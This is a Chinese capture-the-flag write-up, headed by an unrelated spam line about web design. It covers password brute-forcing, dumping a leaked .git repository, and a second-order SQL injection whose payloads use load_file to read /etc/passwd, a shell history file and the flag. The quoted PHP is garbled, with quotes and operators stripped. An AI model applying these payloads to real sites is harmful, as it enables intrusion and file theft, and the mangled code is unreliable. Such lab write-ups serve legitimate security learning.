郑州那里能设计网站,wordpress问答类主题,在哪家网站做推广好,网站模板jsp网站的登录框里有提示
账号#xff1a;zhangwei
密码#xff1a;zhangwei***#xff08;后三位要自己猜#xff09; 用burpsuit抓包爆破发现密码为zhangwei666 进去后就一个留言榜#xff08;目前没发现怎么用#xff09; 扫一下网站发现git泄露 1.下载
进入root用户zhangwei
密码zhangwei***后三位要自己猜 用burpsuit抓包爆破发现密码为zhangwei666 进去后就一个留言榜目前没发现怎么用 扫一下网站发现git泄露 1.下载
进入root用户下载克隆git hack库
git clone https://github.com/BugScanTeam/GitHack下载完成后进入GitHack发现5个文件说明ok了
2.使用 *****使用GitHack时一定要在Git Hack目录下***** python GitHack.py 链接/.git/
首先看kali中的python版本GitHack必须使用python2
需要将python该为python2 python2 GitHack.py 链接/.git/ 出现GitHack就代表成功了Githack目录下就会新增一个扫描的文件
然后就是用GitHack下载源码
python2 GitHack.py http://61.147.171.105:62125/.git/ 下载的文件会在dist目录下 查看源码发现好像代码不全
?php
include mysql.php;
session_start();
if($_SESSION[login] ! yes){header(Location: ./login.php);die();
}
if(isset($_GET[do])){
switch ($_GET[do])
{
case write:break;
case comment:break;
default:header(Location: ./index.php);
}
}
else{header(Location: ./index.php);
}
?使用命令补全
git log --reflog
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c代码审计
?php
include mysql.php;
session_start();
if($_SESSION[login] ! yes){header(Location: ./login.php);die();
}
if(isset($_GET[do])){
switch ($_GET[do])
{
case write:$category addslashes($_POST[category]);$title addslashes($_POST[title]);$content addslashes($_POST[content]);$sql insert into boardset category $category,title $title,content $content;$result mysql_query($sql);header(Location: ./index.php);break;
case comment:$bo_id addslashes($_POST[bo_id]);$sql select category from board where id$bo_id;$result mysql_query($sql);$num mysql_num_rows($result);if($num0){$category mysql_fetch_array($result)[category];$content addslashes($_POST[content]);$sql insert into commentset category $category,content $content,bo_id $bo_id;$result mysql_query($sql);}header(Location: ./comment.php?id$bo_id);break;
default:header(Location: ./index.php);
}
}
else{header(Location: ./index.php);
}
?发现存在sql二次注入在代码comment模块中 $category没有进行过滤就直接放入了sql语句中
$category和$content我们可以控制
其中注意这个sql语句是换行的,我们要用/**/ 进行拼接
$sql insert into commentset category 111,contentuser(),/*,content */#,bo_id $bo_id; 在category 构造payload: 111,contentuser(),/** 在详细里我们提交 */# 来闭合这里得到了用户 同理构造查看密码
111,content(select(load_file(/etc/passwd))),/**/#构造读取他的history文件查看历史记录操作
111,content(select (load_file(/home/www/.bash_history))),/**/#发现原本/tmp/html/目录下有个.DS_Store文件 构造查看这个文件
111,content(select (load_file(/tmp/html/.DS_Store))),/**/#发现长度不够 构造HEX编码
111,content(select hex(load_file(/tmp/html/.DS_Store))),/**/#发现是16进制编码 十六进制到ASCII文本 解码发现flag_8946e1ff1ee3e40f.ph文件 构造查看
111,content(select hex(load_file(/var/www/html/flag_8946e1ff1ee3e40f.php))),/**/#同样解码发现flag $flagflag{0dd14aae81d94904b3492117e2a3d4df};
